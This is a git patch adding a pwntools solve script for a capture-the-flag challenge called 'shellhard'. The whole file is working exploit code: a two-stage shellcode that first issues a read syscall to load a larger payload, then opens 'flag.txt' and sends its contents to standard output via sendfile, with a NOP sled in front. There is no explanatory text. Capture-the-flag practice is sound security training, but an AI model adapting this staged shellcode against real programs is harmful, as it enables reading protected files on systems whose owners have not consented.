From f03955debcd2f9e5623e146298b8d2084fcd97d7 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Wed, 27 Nov 2024 22:11:05 +0300
Subject: [PATCH] solve script

---
 random_challs/shellhard/a.py | 38 ++++++++++++++++++++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 random_challs/shellhard/a.py

diff --git a/random_challs/shellhard/a.py b/random_challs/shellhard/a.py
new file mode 100644
index 0000000..b89b722
--- /dev/null
+++ b/random_challs/shellhard/a.py
@@ -0,0 +1,38 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./shellhard", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+
+# stage 1 
+sc = """
+mov rsi, rdx
+cqo
+mov dl, 0xff
+syscall
+"""
+sc = asm(sc)
+s(sc)
+
+# stage 2
+sc = """
+lea rsi, [rcx+48]
+mov edi, -100
+xor rdx, rdx
+xor r10, r10
+mov rax, 257
+syscall
+mov rsi, rax
+mov rdi, 1
+add r10b, 0xff
+mov rax, 40
+syscall
+"""
+sc = b"\x90"*10 + asm(sc) + b"flag.txt\0"
+s(sc)
+
+r.interactive()
\ No newline at end of file